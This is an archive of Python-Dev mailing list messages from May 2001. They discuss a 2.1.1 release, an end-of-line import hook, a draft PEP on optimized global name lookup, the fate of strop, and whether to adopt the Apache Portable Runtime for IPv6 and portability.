So I spent the last juice in the batteries on the orbital mind-control lasers (long story) to implant some subtle suggestions in a few minds at Netscape and IBM and elsewhere, and started hitting the conference circuit pretty heavy. What suggestions? Oh, nothing important. Nothing at all...BWAHAHAHAHA!!! -- Eric S. Raymond Sometimes the law defends plunder and participates in it. Sometimes the law places the whole apparatus of judges, police, prisons and gendarmes at the service of the plunderers, and treats the victim -- when he defends himself -- as a criminal. -- Frederic Bastiat, "The Law" From gward at python.net Thu May 24 01:48:10 2001 From: gward at python.net (Greg Ward) Date: Wed, 23 May 2001 19:48:10 -0400 Subject: [Python-Dev] Python 2.1.1 In-Reply-To: <15116.8966.324136.897953@anthem.wooz.org>; from barry@digicool.com on Wed, May 23, 2001 at 04:52:22PM -0400 References: <20010523160025.B690@xs4all.nl> <20010523124114.A4747@glacier.fnational.com> <20010523222751.G690@xs4all.nl> <15116.8966.324136.897953@anthem.wooz.org> Message-ID: <20010523194810.A9947@gerg.ca> On 23 May 2001, Barry A. Warsaw said: > The second time I used it, I'd forgotten that you must keep your left > hand on the silver sphere while you line up the parallel lines with > the lip-actuated alpha wheel. What? You mean Guido's time machine was really designed by Larry Wall? Oh, the irony... Greg -- Greg Ward - Python bigot gward at python.net http://starship.python.net/~gward/ If you can read this, thank a programmer. From dgoodger at bigfoot.com Thu May 24 03:04:46 2001 From: dgoodger at bigfoot.com (David Goodger) Date: Wed, 23 May 2001 21:04:46 -0400 Subject: [Python-Dev] Re: Import hook to do end-of-line conversion? In-Reply-To: <3B0AF45D.732126E6@home.net> Message-ID: Yesterday I found I had need for an end-of-line conversion import hook. I looked around but found none (did I miss some code on this thread?), so I whipped one up (below). It seems to do the job.
If you see any goofs, gaffes or gotchas, or if you know of a better way to do this, please let me know. I will post this code to c.l.py in a few days for the enjoyment of all. -- David Goodger dgoodger at bigfoot.com Open-source projects: - The Go Tools Project: http://gotools.sourceforge.net - reStructuredText: http://structuredtext.sourceforge.net (soon!)

-----%<----------cut----------%<----------%<----------cut----------%<-----

# Import hook for end-of-line conversion,
# by David Goodger (dgoodger at bigfoot.com).

# Put in your sitecustomize.py, anywhere on sys.path, and you'll be able to
# import Python modules with any of Unix, Mac, or Windows line endings.

import ihooks, imp, py_compile

class MyHooks(ihooks.Hooks):

    def load_source(self, name, filename, file=None):
        """Compile source files with any line ending."""
        if file:
            file.close()
        py_compile.compile(filename)    # line ending conversion is in here
        cfile = open(filename + (__debug__ and 'c' or 'o'), 'rb')
        try:
            return self.load_compiled(name, filename, cfile)
        finally:
            cfile.close()

class MyModuleLoader(ihooks.ModuleLoader):

    def load_module(self, name, stuff):
        """Special-case package directory imports."""
        file, filename, (suff, mode, type) = stuff
        path = None
        if type == imp.PKG_DIRECTORY:
            stuff = self.find_module_in_dir("__init__", filename, 0)
            file = stuff[0]             # package/__init__.py
            path = [filename]
        try:                            # let superclass handle the rest
            module = ihooks.ModuleLoader.load_module(self, name, stuff)
        finally:
            if file:
                file.close()
        if path:
            module.__path__ = path      # necessary for pkg.module imports
        return module

ihooks.ModuleImporter(MyModuleLoader(MyHooks())).install()

From jeremy at alum.mit.edu Thu May 24 03:10:55 2001 From: jeremy at alum.mit.edu (Jeremy Hylton) Date: Wed, 23 May 2001 21:10:55 -0400 (EDT) Subject: [Python-Dev] pre-PEP on optimized global names Message-ID: <200105240110.VAA09078@newman.concentric.net> I've been hoping to work on optimized global and builtin name support for Python 2.2.
I'm not sure if I'll have time, but thought I'd circulate a draft with some notes on the subject now. Anyone interested in this work? Jeremy

PEP: ???
Title: Optimized Access to Module and Builtin Names
Author: jeremy at digicool.com (Jeremy Hylton)
Status: Draft
Type: Standards Track
Python-Version: 2.2
Created: 23-May-2001

Abstract

    This PEP proposes a new implementation of global module namespaces and the builtin namespace that speeds name resolution. The implementation would use an array of object pointers for most operations in these namespaces. The compiler would assign indices for global variables at compile time.

    The current implementation represents these namespaces as dictionaries. A global name incurs a dictionary lookup each time it is used; a builtin name incurs two dictionary lookups, a failed lookup in the global namespace and a second lookup in the builtin namespace.

    This implementation should speed Python code that uses module-level functions and variables. It should also eliminate awkward coding styles that have evolved to speed access to these names.

    The implementation is complicated because the global and builtin namespaces can be modified dynamically in ways that are impossible for the compiler to detect. (Example: A module's namespace is modified by a script after the module is imported.) As a result, the implementation must maintain several auxiliary data structures to preserve these dynamic features.

Introduction

    [expand on the basic ideas in the abstract]

    [describe the key parts of the design: dlict, compiler support, stupid name trick workarounds, optimization of other modules' globals]

DLict design

    The namespaces are implemented using a data structure that has sometimes gone under the name dlict. It is a dictionary that has numbered slots for some dictionary entries. The type must be implemented in C to achieve acceptable performance.
    A Python implementation is included here to explain the basic design:

        """A dictionary-list hybrid"""

        import types

        class DLict:
            def __init__(self, names):
                # names maps each compile-time global name to its slot index
                assert isinstance(names, types.DictType)
                self.names = names
                size = len(names)
                self.list = [None] * size
                self.empty = [1] * size     # 1 = slot unbound, None = bound
                self.dict = {}              # names not known at compile time
                self.size = 0               # number of bound slots

            def __getitem__(self, name):
                i = self.names.get(name)
                if i is None:
                    return self.dict[name]
                if self.empty[i] is not None:
                    raise KeyError, name
                return self.list[i]

            def __setitem__(self, name, val):
                i = self.names.get(name)
                if i is None:
                    self.dict[name] = val
                else:
                    if self.empty[i] is not None:
                        self.size += 1      # only count newly bound slots
                    self.empty[i] = None
                    self.list[i] = val

            def __delitem__(self, name):
                i = self.names.get(name)
                if i is None:
                    del self.dict[name]
                else:
                    if self.empty[i] is not None:
                        raise KeyError, name
                    self.empty[i] = 1
                    self.list[i] = None
                    self.size -= 1

            def _slot_items(self):
                # (name, value) pairs for the bound numbered slots only
                return [(name, self.list[i]) for name, i in self.names.items()
                        if self.empty[i] is None]

            def keys(self):
                return [name for name, val in self._slot_items()] + self.dict.keys()

            def values(self):
                return [val for name, val in self._slot_items()] + self.dict.values()

            def items(self):
                return self._slot_items() + self.dict.items()

            def __len__(self):
                return self.size + len(self.dict)

            def __cmp__(self, dlict):
                c = cmp(self.names, dlict.names)
                if c != 0:
                    return c
                c = cmp(self.size, dlict.size)
                if c != 0:
                    return c
                for i in range(len(self.names)):
                    c = cmp(self.empty[i], dlict.empty[i])
                    if c != 0:
                        return c
                    if self.empty[i] is None:
                        c = cmp(self.list[i], dlict.list[i])
                        if c != 0:
                            return c
                return cmp(self.dict, dlict.dict)

            def clear(self):
                self.dict.clear()
                for i in range(len(self.names)):
                    self.empty[i] = 1
                    self.list[i] = None
                self.size = 0

            def update(self):
                pass

            def load(self, index):
                """dlict-special method to support indexed access"""
                if self.empty[index] is None:
                    return self.list[index]
                else:
                    raise KeyError, index   # XXX might want reverse mapping

            def store(self, index, val):
                """dlict-special method to support indexed access"""
                if self.empty[index] is not None:
                    self.size += 1
                self.empty[index] = None
                self.list[index] = val

            def delete(self, index):
                """dlict-special method to support indexed access"""
                if self.empty[index] is not None:
                    raise KeyError, index
                self.empty[index] = 1
                self.list[index] = None
                self.size -= 1

Compiler issues

    The compiler currently collects the names of all global variables in a module. These are names bound at the module level or bound in a class or function body that declares them to be global.

    The compiler would assign indices for each global name and add the names and indices of the globals to the module's code object. Each code object would then be bound irrevocably to the module it was defined in. (Not sure if there are some subtle problems with this.)

Enhancement: Optimized access to other modules' globals

    If one module imports another and binds a name in the global namespace, the compiler currently detects that the particular global is bound to a module. The compiler would also note access to any attribute of a module, and emit special opcodes for accessing these names.

    At runtime the implementation can look up the index of the module attribute in the module's namespace. In the importing module's namespace, a pointer to the foreign module's dlict can be recorded along with the name's offset in the dlict. This would allow names, e.g. types.StringType, to be used with the same efficiency as globals.

Backwards compatibility

    The dlict will need to maintain metainformation about whether a slot is currently used or not. It will also need to maintain a pointer to the builtin namespace. When a name is not currently used in the global namespace, the lookup will have to fail over to the builtin namespace.

    In the reverse case, each module may need a special accessor function for the builtin namespace that checks to see if a global shadowing the builtin has been added dynamically. This check would only occur if there was a dynamic change to the module's dlict, i.e. when a name is bound that wasn't discovered at compile-time.
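The fail-over rule in the Backwards compatibility section (an empty global slot falls back to the builtin namespace, and binding the slot later shadows the builtin) can be sketched in a few lines of Python 3. This is a hypothetical illustration, not the PEP's design: `SlotNamespace`, `load_global`, and the `_UNBOUND` sentinel are invented names, and a real implementation would live in C inside the dlict.

```python
import builtins

_UNBOUND = object()   # sentinel marking an empty (unbound) slot

class SlotNamespace:
    """Hypothetical sketch: globals known at compile time live in numbered
    slots; loading an unbound slot fails over to the builtin namespace."""

    def __init__(self, names, builtin_ns=None):
        self.index = {name: i for i, name in enumerate(names)}
        self.slots = [_UNBOUND] * len(names)
        self.builtins = vars(builtins) if builtin_ns is None else builtin_ns

    def store(self, i, value):
        self.slots[i] = value

    def delete(self, i):
        if self.slots[i] is _UNBOUND:
            raise KeyError(i)
        self.slots[i] = _UNBOUND

    def load_global(self, i, name):
        """Load slot i; if it is unbound, look `name` up in the builtins."""
        value = self.slots[i]
        if value is not _UNBOUND:
            return value
        try:
            return self.builtins[name]
        except KeyError:
            raise NameError(name) from None
```

For example, with `ns = SlotNamespace(["len", "x"])`, loading slot `ns.index["len"]` returns the builtin `len` until a module-level `len` is stored into that slot, and loading the unbound `x` raises NameError.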
These mechanisms would have little if any cost for the common case where a module's global namespace is not modified in strange ways at runtime. They would add overhead for modules that did unusual things with global names, but this is an uncommon practice and probably one worth discouraging. It may be desirable to disable dynamic additions to the global namespace in some future version of Python. If so, the new implementation could provide warnings. Local Variables: mode: indented-text indent-tabs-mode: nil End: From barry at digicool.com Thu May 24 04:46:30 2001 From: barry at digicool.com (Barry A. Warsaw) Date: Wed, 23 May 2001 22:46:30 -0400 Subject: [Python-Dev] Python 2.1.1 References: <20010523160025.B690@xs4all.nl> <20010523124114.A4747@glacier.fnational.com> <20010523222751.G690@xs4all.nl> <15116.8966.324136.897953@anthem.wooz.org> <20010523183949.A19251@thyrsus.com> Message-ID: <15116.30214.900667.624573@anthem.wooz.org> >>>>> "ESR" == Eric S Raymond writes: ESR> Before you could say "plot complication" I was materializing ESR> in the Hyraxeum -- damn near nose-to-trunk with the High ESR> Pachyderm himself, as it turned out, who was getting wound up ESR> to try out his newest human-goad on a mahout they had just ESR> captured from the Fortified Cities. That big self-important elephant wasn't named Puffy the Frog by any chance, was he? Did he taste vaguely lemony? If so, he's got a lot of nerve calling himself the "High Pachyderm"! Quite a lofty title for one whose skin is stretched to just this side of its tensile breaking point. Sure, I know ol' Puffy, had a few binges with the old goat myself. You just don't want to be near him when the stray micro-meteor happens to pierce his dermis. Much, MUCH messier than eight crates of cornbob filled to the brim with radioactive gorilla poop, I can assure you! now-where'd-i-leave-my-medication?-ly y'rs, -Barry From esr at thyrsus.com Thu May 24 05:04:58 2001 From: esr at thyrsus.com (Eric S.
Raymond) Date: Wed, 23 May 2001 23:04:58 -0400 Subject: [Python-Dev] Python 2.1.1 In-Reply-To: <15116.30214.900667.624573@anthem.wooz.org>; from barry@digicool.com on Wed, May 23, 2001 at 10:46:30PM -0400 References: <20010523160025.B690@xs4all.nl> <20010523124114.A4747@glacier.fnational.com> <20010523222751.G690@xs4all.nl> <15116.8966.324136.897953@anthem.wooz.org> <20010523183949.A19251@thyrsus.com> <15116.30214.900667.624573@anthem.wooz.org> Message-ID: <20010523230458.A28895@thyrsus.com> Barry A. Warsaw : > That big self-important elephant wasn't named Puffy the Frog by any > chance, was he? Did he taste vaguely lemony? If so, he's got a lot > of nerve calling himself the "High Pachyderm"! Quite a lofty title > for one who's skin is stretched to just this side of its tensile > breaking point. Congratulations, Barry. I googled for "Puffy the Frog" and found a page that...explained...this. It was the #1 hit. Apparently the Universe is an even more random place than I thought. -- Eric S. Raymond If I were to select a jack-booted group of fascists who are perhaps as large a danger to American society as I could pick today, I would pick BATF [the Bureau of Alcohol, Tobacco, and Firearms]. -- U.S. Representative John Dingell, 1980 From barry at digicool.com Thu May 24 05:14:07 2001 From: barry at digicool.com (Barry A. Warsaw) Date: Wed, 23 May 2001 23:14:07 -0400 Subject: [Python-Dev] Python 2.1.1 References: <20010523160025.B690@xs4all.nl> <20010523124114.A4747@glacier.fnational.com> <20010523222751.G690@xs4all.nl> <15116.8966.324136.897953@anthem.wooz.org> <20010523183949.A19251@thyrsus.com> <15116.30214.900667.624573@anthem.wooz.org> <20010523230458.A28895@thyrsus.com> Message-ID: <15116.31871.122265.883855@anthem.wooz.org> >>>>> "ESR" == Eric S Raymond writes: ESR> Congratulations, Barry. I googled for "Puffy the Frog" and ESR> found a page that...explained...this. It was the #1 hit. Yes! In 1965. 
My dad, Pumpi "Weasleteats" Warsaw, was a bluegrass singer in the Atlanta-based band "The Shrinking of George". What you found is no doubt the lyrics to that song, which topped the pop charts briefly in 1965 (August 1st, 1965, 11:57 - 13:01 to be exact), displacing the Beatles "I Wanna Hold Your Head" before being itself displaced by the The Bee Gee's "Booger Feever" [sic]. Sadly, even Napster doesn't have the mp3's and all Dad's old records are scratched beyond hope. ESR> Apparently the Universe is an even more random place than I ESR> thought. here's-where-the-timbot-explains-that-it's-only-pseudo-random-ly y'rs, -Barry From esr at thyrsus.com Thu May 24 05:31:42 2001 From: esr at thyrsus.com (Eric S. Raymond) Date: Wed, 23 May 2001 23:31:42 -0400 Subject: [Python-Dev] Python 2.1.1 In-Reply-To: <15116.31871.122265.883855@anthem.wooz.org>; from barry@digicool.com on Wed, May 23, 2001 at 11:14:07PM -0400 References: <20010523160025.B690@xs4all.nl> <20010523124114.A4747@glacier.fnational.com> <20010523222751.G690@xs4all.nl> <15116.8966.324136.897953@anthem.wooz.org> <20010523183949.A19251@thyrsus.com> <15116.30214.900667.624573@anthem.wooz.org> <20010523230458.A28895@thyrsus.com> <15116.31871.122265.883855@anthem.wooz.org> Message-ID: <20010523233142.A29023@thyrsus.com> Barry A. Warsaw : > Yes! In 1965. My dad, Pumpi "Weasleteats" Warsaw, was a bluegrass > singer in the Atlanta-based band "The Shrinking of George". I suppose it's not a coincidence that it's Fernando Poo day today. Of course it's not a coincidence. There are no coincidences anywhere. Fnord. -- Eric S. Raymond Sometimes it is said that man cannot be trusted with the government of himself. Can he, then, be trusted with the government of others? 
-- Thomas Jefferson, in his 1801 inaugural address From aahz at rahul.net Thu May 24 06:59:37 2001 From: aahz at rahul.net (Aahz Maruch) Date: Wed, 23 May 2001 21:59:37 -0700 (PDT) Subject: [Python-Dev] Killing threads In-Reply-To: from "Tim Peters" at May 23, 2001 03:45:06 PM Message-ID: <20010524045938.5228199C83@waltz.rahul.net> Tim Peters wrote: > [Aahz] >> >> (This got brought up because I experimented with os._exit() as a >> possible solution, but that GPFs on Win98SE.) > > Please open a bug report on that, then, with a tiny test case if possible. > This worked fine on Win98SE for me just now: Futz. *Now* it works. Chalk it up to another unreproducible bug caused by an unstable Win98. -- --- Aahz (@pobox.com) Hugs and backrubs -- I break Rule 6 <*> http://www.rahul.net/aahz/ Androgynous poly kinky vanilla queer het Pythonista I don't really mind a person having the last whine, but I do mind someone else having the last self-righteous whine. From gstein at lyra.org Thu May 24 10:33:49 2001 From: gstein at lyra.org (Greg Stein) Date: Thu, 24 May 2001 01:33:49 -0700 Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.81,2.82 In-Reply-To: ; from gvanrossum@users.sourceforge.net on Mon, May 14, 2001 at 07:14:46PM -0700 References: Message-ID: <20010524013349.Y5402@lyra.org> On Mon, May 14, 2001 at 07:14:46PM -0700, Guido van Rossum wrote: > Update of /cvsroot/python/python/dist/src/Modules > In directory usw-pr-cvs1:/tmp/cvs-serv26415/Modules > > Modified Files: > stropmodule.c > Log Message: > Add warnings to the strop module, for to those functions that really > *are* obsolete; three variables and the maketrans() function are not > (yet) obsolete. > > Add a compensating warnings.filterwarnings() call to test_strop.py. > > Add this to the NEWS. Something that I ran into the other day... 
>>> ob = some_object_implementing_the_buffer_interface >>> string.find(ob, '.') (fails because ob does not define the .find method) >>> strop.find(ob, '.') (succeeds) The point is that strop uses the t# to get a ptr/len pair to do its work. Thus, it can work on many things that export the buffer interface. Dropping strop means we no longer have many of those functions. Instead, the functionality must be copied to *every* object that implements the buffer interface. We can say ob.find() now, but we can't say find(ob) any longer. And saying that all objects (which implement the buffer API) must now implement a bunch of "standard" methods is awfully burdensome. In my particular case, I was trying to do a find on a BufferObject referring to a subset of another object. Blam. No good. Thankfully, when I did a find() on a mmap object, it worked simply because mmaps happen to define a .find method. [ of course, the find method on an mmap was totally broken, but I checked in a fix for that (last week or so) ] So... my question is: is there any way that we can retain a generic find() (and similar functions from the string/strop module) that operates on any type that implements the buffer API? Maybe there is some way we can do a mixin for Python types? e.g. "this mixin implements some standard methods for 8-bit character data (using the buffer API), which can be mixed into new Python types" That would reduce the burden for new types. Thoughts? Cheers, -g -- Greg Stein, http://www.lyra.org/ From gstein at lyra.org Thu May 24 10:52:58 2001 From: gstein at lyra.org (Greg Stein) Date: Thu, 24 May 2001 01:52:58 -0700 Subject: [Python-Dev] IPv6 In-Reply-To: <200105171818.f4HIIRv12891@odiug.digicool.com>; from guido@digicool.com on Thu, May 17, 2001 at 02:18:27PM -0400 References: <200105171818.f4HIIRv12891@odiug.digicool.com> Message-ID: <20010524015258.Z5402@lyra.org> On Thu, May 17, 2001 at 02:18:27PM -0400, Guido van Rossum wrote: > What's out IPv6 story? 
I recall that someone once sent me patches, > but they didn't work for me. Is it time to try again? In certain > circles IPv6 support in Python would be enough to switch programming > languages... :-) Radical suggestion: Toss out a ton of the platform-specific stuff in Python and use the Apache Portable Runtime (APR). It has IPv6 in it, but it could also help with loading shared libraries, threading, mmap'd files, sockets, etc. (it won't replace *all* of Python's platform specific stuff; I think Python has more coverage than APR does) Could simplify a number of things for Python, and reduce some of the maintenance costs... Cheers, -g -- Greg Stein, http://www.lyra.org/ From thomas at xs4all.net Thu May 24 11:01:52 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Thu, 24 May 2001 11:01:52 +0200 Subject: [Python-Dev] Python 2.1.1 In-Reply-To: ; from mwh@python.net on Thu, May 24, 2001 at 08:37:17AM +0100 References: <20010523160025.B690@xs4all.nl> Message-ID: <20010524110152.Q676@xs4all.nl> [ Answer CC'd to python-dev since it deserves an official answer :) ] On Thu, May 24, 2001 at 08:37:17AM +0100, Michael Hudson wrote: > For summarasing purposes, do you have any idea when Python 2.1.1 will > be released? > "No" is a perfectly acceptable answer. Then "No" it is ! Even though I have a fair bit of patches in the queue right now, I need some more time to check out (no pun intended) the changes since the fork, and I want to browse the bug list for possible bugs that should be checked out and fixed for 2.1.1. Another couple of weeks at least, before a release candidate. It also depends on Moshe; if he actually releases 2.0.1 anytime soon, I'll hold off on 2.1.1 a bit longer. -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From mal at lemburg.com Thu May 24 12:18:50 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Thu, 24 May 2001 12:18:50 +0200 Subject: [Python-Dev] strop vs. 
string References: <20010524013349.Y5402@lyra.org> Message-ID: <3B0CE00A.488C8D73@lemburg.com> Greg Stein wrote: > > On Mon, May 14, 2001 at 07:14:46PM -0700, Guido van Rossum wrote: > > Update of /cvsroot/python/python/dist/src/Modules > > In directory usw-pr-cvs1:/tmp/cvs-serv26415/Modules > > > > Modified Files: > > stropmodule.c > > Log Message: > > Add warnings to the strop module, for to those functions that really > > *are* obsolete; three variables and the maketrans() function are not > > (yet) obsolete. > > > > Add a compensating warnings.filterwarnings() call to test_strop.py. > > > > Add this to the NEWS. > > Something that I ran into the other day... > > >>> ob = some_object_implementing_the_buffer_interface > >>> string.find(ob, '.') > (fails because ob does not define the .find method) > >>> strop.find(ob, '.') > (succeeds) > > The point is that strop uses the t# to get a ptr/len pair to do its work. > Thus, it can work on many things that export the buffer interface. Dropping > strop means we no longer have many of those functions. Instead, the > functionality must be copied to *every* object that implements the buffer > interface. > > We can say ob.find() now, but we can't say find(ob) any longer. And saying > that all objects (which implement the buffer API) must now implement a bunch > of "standard" methods is awfully burdensome. > > In my particular case, I was trying to do a find on a BufferObject referring > to a subset of another object. Blam. No good. Thankfully, when I did a > find() on a mmap object, it worked simply because mmaps happen to define a > .find method. > > [ of course, the find method on an mmap was totally broken, but I checked in > a fix for that (last week or so) ] > > So... my question is: is there any way that we can retain a generic find() > (and similar functions from the string/strop module) that operates on any > type that implements the buffer API? > > Maybe there is some way we can do a mixin for Python types? e.g. 
"this mixin > implements some standard methods for 8-bit character data (using the buffer > API), which can be mixed into new Python types" That would reduce the burden > for new types. I suppose that in 2.2 we'll be able to build a class/type hierarchy which then provides these possibilities. I haven't followed Guido's latest checkins closely though -- could be that types don't support multiple inheritence. BTW, wouldn't it suffice to add these methods to buffer objects ? Then you could write: buffer(ob).find('.'). -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From barry at digicool.com Thu May 24 13:50:34 2001 From: barry at digicool.com (Barry A. Warsaw) Date: Thu, 24 May 2001 07:50:34 -0400 Subject: [Python-Dev] IPv6 References: <200105171818.f4HIIRv12891@odiug.digicool.com> <20010524015258.Z5402@lyra.org> Message-ID: <15116.62858.720241.46017@anthem.wooz.org> >>>>> "GS" == Greg Stein writes: GS> Toss out a ton of the platform-specific stuff in Python and GS> use the Apache Portable Runtime (APR). It has IPv6 in it, but GS> it could also help with loading shared libraries, threading, GS> mmap'd files, sockets, etc. I don't know squat about APR, but would it have to be either-or? IOW, would it be possible to wrap the APR in a module (or package) and provide it as an importable alternative? -Barry From mal at lemburg.com Thu May 24 14:22:42 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Thu, 24 May 2001 14:22:42 +0200 Subject: [Python-Dev] IPv6 References: <200105171818.f4HIIRv12891@odiug.digicool.com> <20010524015258.Z5402@lyra.org> <15116.62858.720241.46017@anthem.wooz.org> Message-ID: <3B0CFD12.164271D8@lemburg.com> "Barry A. Warsaw" wrote: > > >>>>> "GS" == Greg Stein writes: > > GS> Toss out a ton of the platform-specific stuff in Python and > GS> use the Apache Portable Runtime (APR). 
It has IPv6 in it, but > GS> it could also help with loading shared libraries, threading, > GS> mmap'd files, sockets, etc. > > I don't know squat about APR, but would it have to be either-or? IOW, > would it be possible to wrap the APR in a module (or package) and > provide it as an importable alternative? Should be possible; the problem is: how do you get the APR types to interact with the original Python ones (e.g. file types). Many low-level Python functions require the native Python types, so while wrapping APR as Python module would provide an alternative, that alternative will most probably not help much w/r to simplifying portability issues. FYI, here's what the APR has to offer (taken from the APRDesign file that comes with Apache 2.0 beta): """ The base types in APR file_io File I/O, including pipes lib A portable library originally used in Apache. This contains memory management, tables, and arrays. locks Mutex and reader/writer locks misc Any APR type which doesn't have any other place to belong network_io Network I/O shmem Shared Memory (Not currently implemented) signal Asynchronous Signals threadproc Threads and Processes time Time """ It currently supports: Unix (includes BeOS), Win32 and OS/2. -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From gstein at lyra.org Thu May 24 14:55:55 2001 From: gstein at lyra.org (Greg Stein) Date: Thu, 24 May 2001 05:55:55 -0700 Subject: [Python-Dev] APR (was: IPv6) In-Reply-To: <3B0CFD12.164271D8@lemburg.com>; from mal@lemburg.com on Thu, May 24, 2001 at 02:22:42PM +0200 References: <200105171818.f4HIIRv12891@odiug.digicool.com> <20010524015258.Z5402@lyra.org> <15116.62858.720241.46017@anthem.wooz.org> <3B0CFD12.164271D8@lemburg.com> Message-ID: <20010524055555.B5402@lyra.org> On Thu, May 24, 2001 at 02:22:42PM +0200, M.-A. 
Lemburg wrote: > "Barry A. Warsaw" wrote: > > >>>>> "GS" == Greg Stein writes: > > > > GS> Toss out a ton of the platform-specific stuff in Python and > > GS> use the Apache Portable Runtime (APR). It has IPv6 in it, but > > GS> it could also help with loading shared libraries, threading, > > GS> mmap'd files, sockets, etc. > > > > I don't know squat about APR, but would it have to be either-or? IOW, > > would it be possible to wrap the APR in a module (or package) and > > provide it as an importable alternative? Sure, that is a possibility, but it doesn't save Python much in terms of maintenance or portability. "Just another library" Truly using it could certainly be done as a slow migration, and it is definitely possible to only use portions, subsets, etc. Another alternative would be to use APR as a "platform target". But that just adds yet another platform to support rather than simplifying. > Should be possible; the problem is: how do you get the APR types > to interact with the original Python ones (e.g. file types). Many The header is a total misnomer, but "apr_portable.h" provides access to an opaque type's underlying native object (many of us aren't sure how Ryan arrived at "portable" being the name for the least-portable aspect of the library :-). Anyways... you can extract a file descriptor from a file or socket or pipe. Or a thread ID from a thread object. etc. > low-level Python functions require the native Python types, so > while wrapping APR as Python module would provide an alternative, that > alternative will most probably not help much w/r to simplifying > portability issues. Right. I'd say use the APR functions unless absolute speed is required (such as the readlines stuff). But you could also argue that the hard-core platform specific optimizations could go into APR itself, so that Python doesn't have to worry about them.
> FYI, here's what the APR has to offer (taken from the APRDesign > file that comes with Apache 2.0 beta): > """ > The base types in APR > file_io File I/O, including pipes > lib A portable library originally used in Apache. This contains > memory management, tables, and arrays. > locks Mutex and reader/writer locks > misc Any APR type which doesn't have any other place to belong > network_io Network I/O > shmem Shared Memory (Not currently implemented) > signal Asynchronous Signals > threadproc Threads and Processes > time Time > """ That doc is out of date; the list is missing: shared library handling, i18n, mmap, user information access (e.g. getpwnam), uuid handling, getopt replacements, cryptographic random data, and a few other bits here and there. The shared mem actually is implemented mostly, via the libmm library. And note that some of those topics have some nice depth. As I mentioned, network_io supports IPv6, but also portable name lookups, sendfile(), etc. The file_io stuff support optimized stat() and opendir-type calls for the platform. > It currently supports: Unix (includes BeOS), Win32 and OS/2. A lot more than that :-) Pretty much all the Unix variants, including OS/390 and BS2000 and MacOS X, and TPF, and some other oddballs. Cheers, -g -- Greg Stein, http://www.lyra.org/ From gstein at lyra.org Thu May 24 15:00:16 2001 From: gstein at lyra.org (Greg Stein) Date: Thu, 24 May 2001 06:00:16 -0700 Subject: [Python-Dev] strop vs. string In-Reply-To: <3B0CE00A.488C8D73@lemburg.com>; from mal@lemburg.com on Thu, May 24, 2001 at 12:18:50PM +0200 References: <20010524013349.Y5402@lyra.org> <3B0CE00A.488C8D73@lemburg.com> Message-ID: <20010524060016.D5402@lyra.org> On Thu, May 24, 2001 at 12:18:50PM +0200, M.-A. Lemburg wrote: > Greg Stein wrote: >... > > So... my question is: is there any way that we can retain a generic find() > > (and similar functions from the string/strop module) that operates on any > > type that implements the buffer API? 
> > > > Maybe there is some way we can do a mixin for Python types? e.g. "this mixin > > implements some standard methods for 8-bit character data (using the buffer > > API), which can be mixed into new Python types" That would reduce the burden > > for new types. > > I suppose that in 2.2 we'll be able to build a class/type > hierarchy which then provides these possibilities. I haven't > followed Guido's latest checkins closely though -- could be that > types don't support multiple inheritence. No idea either... that's why I asked. > BTW, wouldn't it suffice to add these methods to buffer objects ? > Then you could write: buffer(ob).find('.'). You're totally missing the point with that suggestion. It does *not* suffice to add them to buffer objects. What about array objects? mmap objects? Random Joe Object who implements the buffer interface? All of those are out of luck. With strop, I can pass any of those objects to strop.find(). That function has a polymorphic argument. In the current arrangement, every object must implement their own .find and .upper and .whatever. Cheers, -g -- Greg Stein, http://www.lyra.org/ From mwh at python.net Thu May 24 15:02:34 2001 From: mwh at python.net (Michael Hudson) Date: Thu, 24 May 2001 14:02:34 +0100 (BST) Subject: [Python-Dev] APR (was: IPv6) In-Reply-To: <20010524055555.B5402@lyra.org> Message-ID: I can't think of a good way of expressing this, but I don't think we should try to make writing non cross-platform code in Python impossible. Yes, it should be easy to write x-platform code, but if there's some very specific platform trick I can do with, say, setsockopt, I don't want Python to hide it from me just 'cause it doesn't work on VMS. Maybe this isn't an issue here. On Thu, 24 May 2001, Greg Stein wrote: [...] > That doc is out of date; the list is missing: shared library handling, i18n, > mmap, user information access (e.g. 
getpwnam), uuid handling, getopt > replacements, cryptographic random data, and a few other bits here and > there. The shared mem actually is implemented mostly, via the libmm library. How big is APR? How stable? (in terms of interface; I'm assuming it doesn't crap out through bad programming or it'd be a non-starter) > And note that some of those topics have some nice depth. As I mentioned, > network_io supports IPv6, but also portable name lookups, sendfile(), etc. > The file_io stuff support optimized stat() and opendir-type calls for the > platform. > > > It currently supports: Unix (includes BeOS), Win32 and OS/2. > > A lot more than that :-) Pretty much all the Unix variants, including > OS/390 and BS2000 and MacOS X, and TPF, and some other oddballs. That's still less than Python isn't it? RiscOS, Amiga, PalmOS, VMS, Playstation 2(!), from looking at http://www.python.org/download/download_other.html. Cheers, M. From gstein at lyra.org Thu May 24 15:59:21 2001 From: gstein at lyra.org (Greg Stein) Date: Thu, 24 May 2001 06:59:21 -0700 Subject: [Python-Dev] APR (was: IPv6) In-Reply-To: ; from mwh@python.net on Thu, May 24, 2001 at 02:02:34PM +0100 References: <20010524055555.B5402@lyra.org> Message-ID: <20010524065921.E5402@lyra.org> On Thu, May 24, 2001 at 02:02:34PM +0100, Michael Hudson wrote: > I can't think of a good way of expressing this, but I don't think we > should try to make writing non cross-platform code in Python impossible. I don't think this would preclude writing non cross-platform code. As I mentioned, there isn't anything that would prevent the stuff from working side by side. The idea is to simplify certain aspects of Python's platform specific stuff. For example: all those variants of dynamically loading shared modules (Python/dynload_*.c) can be tossed along with the config magic. 
